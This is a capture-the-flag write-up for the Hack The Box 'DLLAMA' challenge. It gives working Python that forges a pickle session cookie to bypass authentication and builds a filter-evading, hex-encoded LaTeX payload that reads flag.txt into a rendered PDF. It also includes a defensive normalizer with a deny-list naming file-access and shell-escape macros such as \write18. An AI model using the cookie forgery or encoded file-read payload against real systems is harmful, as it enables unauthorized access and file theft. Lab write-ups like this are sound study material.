HackTheBox DLLAMA Writeup

Explore the basics of cybersecurity in the DLLAMA challenge on Hack The Box. This medium-level challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

import base64
import pickle
import binascii
import pickletools

# Session cookie issued by the application: a base64-encoded pickle of a User object.
original_cookie = 'gASVPQAAAAAAAACMCF9fbWFpbl9flIwEVXNlcpSTlCmBlH2UKIwIdXNlcm5hbWWUjAFhlIwNYXV0aGVudGljYXRlZJSJdWIu'

# Disassemble the pickle to inspect its structure without executing it.
pickle_data = base64.b64decode(original_cookie)
pickletools.dis(pickle_data)

# Local stand-in for the class the pickle references (__main__.User).
class User:
    def __init__(self, username, authenticated=False):
        self.username = username
        self.authenticated = authenticated

# Load the cookie, flip the authenticated flag and re-serialize it.
decoded_cookie = base64.b64decode(original_cookie)
user = pickle.loads(decoded_cookie)
user.authenticated = True
modified_pickle = pickle.dumps(user)
modified_cookie = base64.b64encode(modified_pickle).decode('utf-8')
print("Modified cookie:", modified_cookie)

# LaTeX document that includes flag.txt verbatim in the rendered PDF.
latex_code = r"""
\documentclass{article}
\usepackage{verbatim}

\begin{document}

\section{flag.txt}
\verbatiminput{flag.txt}

\end{document}
"""

# Encode every byte as TeX ^^hh notation, keeping newlines as real line breaks.
byte_representation = latex_code.encode('utf-8')
hex_representation = binascii.hexlify(byte_representation).decode('utf-8')
formatted_output = ''
for i in range(0, len(hex_representation), 2):
    hex_pair = hex_representation[i:i+2]
    if hex_pair == '0a':
        formatted_output += '\n'
    else:
        formatted_output += f"^^{hex_pair}"

print(formatted_output)

Copy the modified cookie and navigate to /. Paste the generated payload into the LaTeX-to-PDF parser:

^^5c^^64^^6f^^63^^75^^6d^^65^^6e^^74^^63^^6c^^61^^73^^73^^7b^^61^^72^^74^^69^^63^^6c^^65^^7d
^^5c^^75^^73^^65^^70^^61^^63^^6b^^61^^67^^65^^7b^^76^^65^^72^^62^^61^^74^^69^^6d^^7d

^^5c^^62^^65^^67^^69^^6e^^7b^^64^^6f^^63^^75^^6d^^65^^6e^^74^^7d

^^5c^^73^^65^^63^^74^^69^^6f^^6e^^7b^^66^^6c^^61^^67^^2e^^74^^78^^74^^7d
^^5c^^76^^65^^72^^62^^61^^74^^69^^6d^^69^^6e^^70^^75^^74^^7b^^66^^6c^^61^^67^^2e^^74^^78^^74^^7d

^^5c^^65^^6e^^64^^7b^^64^^6f^^63^^75^^6d^^65^^6e^^74^^7d

Download the generated PDF, which contains the flag.
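
The payload above is written entirely in TeX's ^^hh notation, which TeX converts back to characters while reading its input, so a check on the raw text never sees a macro name such as \verbatiminput. The following is an added example, not part of the original writeup or the challenge's code: a defender-side normalizer that resolves the notation before a deny-list check. The function names and the macro list are illustrative assumptions.

```python
import re

# TeX reads ^^hh (two lowercase hex digits) as the character with that code,
# and ^^c as the character whose code is c XOR 64 (for c < 128).
_CARET = re.compile(r"\^\^(?:([0-9a-f]{2})|([\x00-\x7f]))")

# Illustrative deny-list of file- and shell-access macros (an assumption, not
# the filter used by the challenge).
FILE_ACCESS_MACROS = (
    r"\input", r"\include", r"\verbatiminput", r"\lstinputlisting",
    r"\openin", r"\read", r"\write18", r"\catcode",
)


def normalize_tex(source: str, max_passes: int = 8) -> str:
    """Resolve ^^ notation until stable; a decoded char may start a new ^^ pair."""
    def _sub(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(ord(m.group(2)) ^ 0x40)

    for _ in range(max_passes):
        decoded = _CARET.sub(_sub, source)
        if decoded == source:
            return decoded
        source = decoded
    raise ValueError("too many nested ^^ layers; reject the input")


def find_file_access(source: str) -> list[str]:
    """Return the deny-listed macros present after normalization."""
    text = normalize_tex(source)
    return [m for m in FILE_ACCESS_MACROS
            if re.search(re.escape(m) + r"(?![A-Za-z])", text)]


# One line of the payload shown above on this page.
SAMPLE = ("^^5c^^76^^65^^72^^62^^61^^74^^69^^6d^^69^^6e^^70^^75^^74"
          "^^7b^^66^^6c^^61^^67^^2e^^74^^78^^74^^7d")

if __name__ == "__main__":
    print(normalize_tex(SAMPLE))
    print(find_file_access(SAMPLE))
```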

Summary

DLLAMA is a medium-level challenge on Hack The Box that exploits insecure deserialization and LaTeX-to-PDF injection. A serialized cookie is decoded, modified to authenticate the user, and re-encoded to access restricted areas. A crafted LaTeX payload embeds the content of flag.txt into a PDF. Submitting the payload through the document parser reveals the flag in the generated PDF.

This post is licensed under CC BY 4.0 by the author.